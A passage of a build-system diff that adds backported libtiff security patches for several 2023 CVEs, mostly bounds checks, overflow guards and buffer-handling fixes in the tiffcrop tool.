+- &crop->combined_length, crop_buff_ptr))
++ &crop->combined_length, crop_buff_ptr, TRUE))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8443,7 +8444,7 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+ /* Rotate an image by a multiple of 90 degrees clockwise */
+ static int
+ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+- uint32 *img_length, unsigned char **ibuff_ptr)
++ uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
+ {
+ int shift_width;
+ uint32 bytes_per_pixel, bytes_per_sample;
+@@ -8634,11 +8635,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+
+ *img_width = length;
+ *img_length = width;
+- image->width = length;
+- image->length = width;
+- res_temp = image->xres;
+- image->xres = image->yres;
+- image->yres = res_temp;
++ /* Only toggle image parameters if whole input image is rotated. */
++ if (rot_image_params)
++ {
++ image->width = length;
++ image->length = width;
++ res_temp = image->xres;
++ image->xres = image->yres;
++ image->yres = res_temp;
++ }
+ break;
+
+ case 270: if ((bps % 8) == 0) /* byte aligned data */
+@@ -8711,11 +8716,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+
+ *img_width = length;
+ *img_length = width;
+- image->width = length;
+- image->length = width;
+- res_temp = image->xres;
+- image->xres = image->yres;
+- image->yres = res_temp;
++ /* Only toggle image parameters if whole input image is rotated. */
++ if (rot_image_params)
++ {
++ image->width = length;
++ image->length = width;
++ res_temp = image->xres;
++ image->xres = image->yres;
++ image->yres = res_temp;
++ }
+ break;
+ default:
+ break;
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
new file mode 100644
index 0000000000..bf1a439b4d
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
@@ -0,0 +1,135 @@
+From e18be834497e0ebf68d443abb9e18187f36cd3bf Mon Sep 17 00:00:00 2001
+From: Markus Koschany <apo@debian.org>
+Date: Tue, 21 Feb 2023 14:39:52 +0100
+Subject: [PATCH] CVE-2023-0800
+
+This is also the fix for CVE-2023-0801, CVE-2023-0802, CVE-2023-0803,
+CVE-2023-0804.
+
+Bug-Debian: https://bugs.debian.org/1031632
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/33aee1275d9d1384791d2206776eb8152d397f00
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2023-0800 CVE-2023-0801 CVE-2023-0802 CVE-2023-0803 CVE-2023-0804
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiffcrop.c | 73 +++++++++++++++++++++++++++++++++++++++++++++---
+ 1 file changed, 69 insertions(+), 4 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f21a7d7..742615a 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5250,18 +5250,40 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+
+ crop->regionlist[i].buffsize = buffsize;
+ crop->bufftotal += buffsize;
++
++ /* For composite images with more than one region, the
++ * combined_length or combined_width always needs to be equal,
++ * respectively.
++ * Otherwise, even the first section/region copy
++ * action might cause buffer overrun. */
+ if (crop->img_mode == COMPOSITE_IMAGES)
+ {
+ switch (crop->edge_ref)
+ {
+ case EDGE_LEFT:
+ case EDGE_RIGHT:
++ if (i > 0 && zlength != crop->combined_length)
++ {
++ TIFFError(
++ "computeInputPixelOffsets",
++ "Only equal length regions can be combined for "
++ "-E left or right");
++ return (-1);
++ }
+ crop->combined_length = zlength;
+ crop->combined_width += zwidth;
+ break;
+ case EDGE_BOTTOM:
+ case EDGE_TOP: /* width from left, length from top */
+ default:
++ if (i > 0 && zwidth != crop->combined_width)
++ {
++ TIFFError("computeInputPixelOffsets",
++ "Only equal width regions can be "
++ "combined for -E "
++ "top or bottom");
++ return (-1);
++ }
+ crop->combined_width = zwidth;
+ crop->combined_length += zlength;
+ break;
+@@ -6416,6 +6438,47 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ crop->combined_width = 0;
+ crop->combined_length = 0;
+
++ /* If there is more than one region, check beforehand whether all the width
++ * and length values of the regions are the same, respectively. */
++ switch (crop->edge_ref)
++ {
++ default:
++ case EDGE_TOP:
++ case EDGE_BOTTOM:
++ for (i = 1; i < crop->selections; i++)
++ {
++ uint32_t crop_width0 =
++ crop->regionlist[i - 1].x2 - crop->regionlist[i - 1].x1 + 1;
++ uint32_t crop_width1 =
++ crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
++ if (crop_width0 != crop_width1)
++ {
++ TIFFError("extractCompositeRegions",
++ "Only equal width regions can be combined for -E "
++ "top or bottom");
++ return (1);
++ }
++ }
++ break;
++ case EDGE_LEFT:
++ case EDGE_RIGHT:
++ for (i = 1; i < crop->selections; i++)
++ {
++ uint32_t crop_length0 =
++ crop->regionlist[i - 1].y2 - crop->regionlist[i - 1].y1 + 1;
++ uint32_t crop_length1 =
++ crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
++ if (crop_length0 != crop_length1)
++ {
++ TIFFError("extractCompositeRegions",
++ "Only equal length regions can be combined for "
++ "-E left or right");
++ return (1);
++ }
++ }
++ }
++
++
+ for (i = 0; i < crop->selections; i++)
+ {
+ /* rows, columns, width, length are expressed in pixels */
+@@ -6439,8 +6502,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ default:
+ case EDGE_TOP:
+ case EDGE_BOTTOM:
+- if ((i > 0) && (crop_width != crop->regionlist[i - 1].width))
+- {
++ if ((crop->selections > i + 1) &&
++ (crop_width != crop->regionlist[i + 1].width))
++ {
+ TIFFError ("extractCompositeRegions",
+ "Only equal width regions can be combined for -E top or bottom");
+ return (1);
+@@ -6520,8 +6584,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ break;
+ case EDGE_LEFT: /* splice the pieces of each row together, side by side */
+ case EDGE_RIGHT:
+- if ((i > 0) && (crop_length != crop->regionlist[i - 1].length))
+- {
++ if ((crop->selections > i + 1) &&
++ (crop_length != crop->regionlist[i + 1].length))
++ {
+ TIFFError ("extractCompositeRegions",
+ "Only equal length regions can be combined for -E left or right");
+ return (1);
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
new file mode 100644
index 0000000000..9915b77645
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
@@ -0,0 +1,91 @@
+From 848434a81c443f59ec90d41218eba6e48a450a11 Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Thu, 16 Mar 2023 16:16:54 +0800
+Subject: [PATCH] Fix heap-buffer-overflow in function extractImageSection
+
+CVE: CVE-2023-1916
+Upstream-Status: Submitted [https://gitlab.com/libtiff/libtiff/-/commit/848434a81c443f59ec90d41218eba6e48a450a11 https://gitlab.com/libtiff/libtiff/-/merge_requests/535]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ archive/tools/tiffcrop.c | 62 +++++++++++++++++++++++++++++-----------
+ 1 file changed, 45 insertions(+), 17 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/tools/tiffcrop.c
++++ tiff-4.1.0+git191117/tools/tiffcrop.c
+@@ -5549,6 +5549,15 @@ getCropOffsets(struct image_data *image,
+ crop->combined_width += (uint32)zwidth;
+ else
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ case EDGE_BOTTOM: /* width from left, zones from bottom to top */
+ zwidth = offsets.crop_width;
+@@ -5579,6 +5588,15 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->combined_length = (uint32)zlength;
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ case EDGE_RIGHT: /* zones from right to left, length from top */
+ zlength = offsets.crop_length;
+@@ -5606,6 +5624,15 @@ getCropOffsets(struct image_data *image,
+ crop->combined_width += (uint32)zwidth;
+ else
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ case EDGE_TOP: /* width from left, zones from top to bottom */
+ default:
+@@ -5632,6 +5659,15 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->combined_length = (uint32)zlength;
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ } /* end switch statement */
+
+@@ -6827,9 +6863,9 @@ extractImageSection(struct image_data *i
+ * regardless of the way the data are organized in the input file.
+ * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
+ */
+- img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
+- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
+- trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
++ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
++ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
++ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
+
+ #ifdef DEVELMODE
+ TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
new file mode 100644
index 0000000000..7d6d40f25a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
@@ -0,0 +1,173 @@
+From 9c22495e5eeeae9e00a1596720c969656bb8d678 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 3 Feb 2023 15:31:31 +0100
+Subject: [PATCH] tiffcrop correctly update buffersize after rotateImage()
+ fix#520 rotateImage() set up a new buffer and calculates its size
+ individually. Therefore, seg_buffs[] size needs to be updated accordingly.
+ Before this fix, the seg_buffs buffer size was calculated with a different
+ formula than within rotateImage().
+
+Closes #520.
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9c22495e5eeeae9e00a1596720c969656bb8d678 && https://gitlab.com/libtiff/libtiff/-/commit/688012dca2c39033aa2dc7bcea9796787cfd1b44]
+CVE: CVE-2023-25433
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 69 +++++++++++++++++++++++++++++++++++++++---------
+ 1 file changed, 56 insertions(+), 13 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 742615a..aab0ec6 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **, int);
++ unsigned char **, size_t *);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -6384,7 +6384,7 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ * but switch xres, yres there. */
+ uint32_t width = image->width;
+ uint32_t length = image->length;
+- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
+ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+@@ -7607,8 +7607,12 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
++ /* rotateImage() set up a new buffer and calculates its size
++ * individually. Therefore, seg_buffs size needs to be updated
++ * accordingly. */
++ size_t rot_buf_size = 0;
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff, FALSE))
++ &crop->combined_length, &crop_buff, &rot_buf_size))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7713,8 +7717,13 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+- if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff, FALSE))
++ /* Furthermore, rotateImage() set up a new buffer and calculates
++ * its size individually. Therefore, seg_buffs size needs to be
++ * updated accordingly. */
++ size_t rot_buf_size = 0;
++ if (rotateImage(
++ crop->rotation, image, &crop->regionlist[i].width,
++ &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7725,8 +7734,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ crop->combined_width = total_width;
+ crop->combined_length = total_length;
+ seg_buffs[i].buffer = crop_buff;
+- seg_buffs[i].size = (((crop->regionlist[i].width * image->bps + 7 ) / 8)
+- * image->spp) * crop->regionlist[i].length;
++ seg_buffs[i].size = rot_buf_size;
+ }
+ }
+ }
+@@ -7735,7 +7743,6 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+
+ /* Copy the crop section of the data from the current image into a buffer
+ * and adjust the IFD values to reflect the new size. If no cropping is
+- * required, use the origial read buffer as the crop buffer.
+ *
+ * There is quite a bit of redundancy between this routine and the more
+ * specialized processCropSelections, but this provides
+@@ -7846,7 +7853,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, crop_buff_ptr, TRUE))
++ &crop->combined_length, crop_buff_ptr, NULL))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8515,7 +8522,8 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ uint32 bytes_per_pixel, bytes_per_sample;
+ uint32 row, rowsize, src_offset, dst_offset;
+ uint32 i, col, width, length;
+- uint32 colsize, buffsize, col_offset, pix_offset;
++ uint32 colsize, col_offset, pix_offset;
++ tmsize_t buffsize;
+ unsigned char *ibuff;
+ unsigned char *src;
+ unsigned char *dst;
+@@ -8528,12 +8536,41 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ spp = image->spp;
+ bps = image->bps;
+
++ if ((spp != 0 && bps != 0 &&
++ width > (uint32_t)((UINT32_MAX - 7) / spp / bps)) ||
++ (spp != 0 && bps != 0 &&
++ length > (uint32_t)((UINT32_MAX - 7) / spp / bps)))
++ {
++ TIFFError("rotateImage", "Integer overflow detected.");
++ return (-1);
++ }
++
+ rowsize = ((bps * spp * width) + 7) / 8;
+ colsize = ((bps * spp * length) + 7) / 8;
+ if ((colsize * width) > (rowsize * length))
+- buffsize = (colsize + 1) * width;
++{
++ if (((tmsize_t)colsize + 1) != 0 &&
++ (tmsize_t)width > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
++ ((tmsize_t)colsize + 1)))
++ {
++ TIFFError("rotateImage",
++ "Integer overflow when calculating buffer size.");
++ return (-1);
++ }
++ buffsize = ((tmsize_t)colsize + 1) * width;
++ }
+ else
+- buffsize = (rowsize + 1) * length;
++ {
++ if (((tmsize_t)rowsize + 1) != 0 &&
++ (tmsize_t)length > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
++ ((tmsize_t)rowsize + 1)))
++ {
++ TIFFError("rotateImage",
++ "Integer overflow when calculating buffer size.");
++ return (-1);
++ }
++ buffsize = (rowsize + 1) * length;
++ }
+
+ bytes_per_sample = (bps + 7) / 8;
+ bytes_per_pixel = ((bps * spp) + 7) / 8;
+@@ -8556,11 +8593,17 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ /* Add 3 padding bytes for extractContigSamplesShifted32bits */
+ if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
+ {
+- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
++ TIFFError("rotateImage",
++ "Unable to allocate rotation buffer of %" TIFF_SSIZE_FORMAT
++ " bytes ",
++ buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ return (-1);
+ }
+ _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
+
++ if (rot_buf_size != NULL)
++ *rot_buf_size = buffsize;
++
+ ibuff = *ibuff_ptr;
+ switch (rotation)
+ {
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
new file mode 100644
index 0000000000..6a6596f092
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
@@ -0,0 +1,94 @@
+From 69818e2f2d246e6631ac2a2da692c3706b849c38 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sun, 29 Jan 2023 11:09:26 +0100
+Subject: [PATCH] tiffcrop: Amend rotateImage() not to toggle the input (main)
+ image width and length parameters when only cropped image sections are
+ rotated. Remove buffptr from region structure because never used.
+
+Closes #492 #493 #494 #495 #499 #518 #519
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/69818e2f2d246e6631ac2a2da692c3706b849c38]
+CVE: CVE-2023-25434 & CVE-2023-25435
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 29 +++++++++++++++++------------
+ 1 file changed, 17 insertions(+), 12 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index aab0ec6..ce84414 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **, size_t *);
++ unsigned char **, size_t *, int);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -6382,10 +6382,11 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ /* Dummy variable in order not to switch two times the
+ * image->width,->length within rotateImage(),
+ * but switch xres, yres there. */
+- uint32_t width = image->width;
+- uint32_t length = image->length;
+- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
+- {
++ uint32_t width = image->width;
++ uint32_t length = image->length;
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL,
++ TRUE))
++ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+ }
+@@ -7612,7 +7613,8 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ * accordingly. */
+ size_t rot_buf_size = 0;
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff, &rot_buf_size))
++ &crop->combined_length, &crop_buff, &rot_buf_size,
++ FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7721,9 +7723,10 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ * its size individually. Therefore, seg_buffs size needs to be
+ * updated accordingly. */
+ size_t rot_buf_size = 0;
+- if (rotateImage(
+- crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
++ if (rotateImage(crop->rotation, image,
++ &crop->regionlist[i].width,
++ &crop->regionlist[i].length, &crop_buff,
++ &rot_buf_size, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7853,7 +7856,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, crop_buff_ptr, NULL))
++ &crop->combined_length, crop_buff_ptr, NULL, TRUE))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8515,8 +8518,10 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+
+ /* Rotate an image by a multiple of 90 degrees clockwise */
+ static int
+-rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+- uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
++rotateImage(uint16 rotation, struct image_data *image,
++ uint32 *img_width, uint32 *img_length,
++ unsigned char **ibuff_ptr, size_t *rot_buf_size,
++ int rot_image_params)
+ {
+ int shift_width;
+ uint32 bytes_per_pixel, bytes_per_sample;
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
new file mode 100644
index 0000000000..b7a7e93764
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
@@ -0,0 +1,90 @@
+From ec8ef90c1f573c9eb1f17d6a056aa0015f184acf Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Tue, 14 Feb 2023 20:43:43 +0100
+Subject: [PATCH] tiffcrop: Do not reuse input buffer for subsequent images.
+ Fix issue 527
+
+Reuse of read_buff within loadImage() from previous image is quite unsafe, because other functions (like rotateImage() etc.) reallocate that buffer with different size without updating the local prev_readsize value.
+
+Closes #527
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
+CVE: CVE-2023-26965
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 40 ++++++++++------------------------------
+ 1 file changed, 10 insertions(+), 30 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index ce84414..a533089 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5935,9 +5935,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ uint32 tw = 0, tl = 0; /* Tile width and length */
+ tmsize_t tile_rowsize = 0;
+ unsigned char *read_buff = NULL;
+- unsigned char *new_buff = NULL;
+ int readunit = 0;
+- static tmsize_t prev_readsize = 0;
+
+ TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
+ TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
+@@ -6232,37 +6230,20 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ read_buff = *read_ptr;
+ /* +3 : add a few guard bytes since reverseSamples16bits() can read a bit */
+ /* outside buffer */
+- if (!read_buff)
++ if (read_buff)
+ {
+- if( buffsize > 0xFFFFFFFFU - 3 )
+- {
+- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+- return (-1);
+- }
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
++ _TIFFfree(read_buff);
+ }
+- else
+- {
+- if (prev_readsize < buffsize)
+- {
+- if( buffsize > 0xFFFFFFFFU - 3 )
+- {
+- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+- return (-1);
+- }
+- new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
+- if (!new_buff)
+- {
+- free (read_buff);
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+- }
+- else
+- read_buff = new_buff;
+- }
+- }
++ if (buffsize > 0xFFFFFFFFU - 3)
++ {
++ TIFFError("loadImage", "Required read buffer size too large");
++ return (-1);
++ }
++ read_buff =
++ (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!read_buff)
+ {
+- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
++ TIFFError("loadImage", "Unable to allocate read buffer");
+ return (-1);
+ }
+
+@@ -6270,7 +6251,6 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ read_buff[buffsize+1] = 0;
+ read_buff[buffsize+2] = 0;
+
+- prev_readsize = buffsize;
+ *read_ptr = read_buff;
+
+ /* N.B. The read functions used copy separate plane data into a buffer as interleaved
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
new file mode 100644
index 0000000000..48657e6aa4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
@@ -0,0 +1,35 @@
+From b0e1c25dd1d065200c8d8f59ad0afe014861a1b9 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Thu, 16 Feb 2023 12:03:16 +0100
+Subject: [PATCH] tif_luv: Check and correct for NaN data in uv_encode().
+
+Closes #530
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
+CVE: CVE-2023-26966
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_luv.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/libtiff/tif_luv.c b/libtiff/tif_luv.c
+index 6fe4858..8b2c5f1 100644
+--- a/libtiff/tif_luv.c
++++ b/libtiff/tif_luv.c
+@@ -923,6 +923,13 @@ uv_encode(double u, double v, int em) /* encode (u',v') coordinates */
+ {
+ register int vi, ui;
+
++ /* check for NaN */
++ if (u != u || v != v)
++ {
++ u = U_NEU;
++ v = V_NEU;
++ }
++
+ if (v < UV_VSTART)
+ return oog_encode(u, v);
+ vi = itrunc((v - UV_VSTART)*(1./UV_SQSIZ), em);
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
new file mode 100644
index 0000000000..62a5e1831c
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
@@ -0,0 +1,33 @@
+From 8c0859a80444c90b8dfb862a9f16de74e16f0a9e Mon Sep 17 00:00:00 2001
+From: xiaoxiaoafeifei <lliangliang2007@163.com>
+Date: Fri, 21 Apr 2023 13:01:34 +0000
+Subject: [PATCH] countInkNamesString(): fix `UndefinedBehaviorSanitizer`:
+ applying zero offset to null pointer
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9bd48f0dbd64fb94dc2b5b05238fde0bfdd4ff3f]
+CVE: CVE-2023-2908
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_dir.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 9d8267a..6389b40 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -145,10 +145,10 @@ static uint16
+ countInkNamesString(TIFF *tif, uint32 slen, const char *s)
+ {
+ uint16 i = 0;
+- const char *ep = s + slen;
+- const char *cp = s;
+
+ if (slen > 0) {
++ const char *ep = s + slen;
++ const char *cp = s;
+ do {
+ for (; cp < ep && *cp != '\0'; cp++) {}
+ if (cp >= ep)
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
new file mode 100644
index 0000000000..8db24fc714
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
@@ -0,0 +1,59 @@
+From d63de61b1ec3385f6383ef9a1f453e4b8b11d536 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
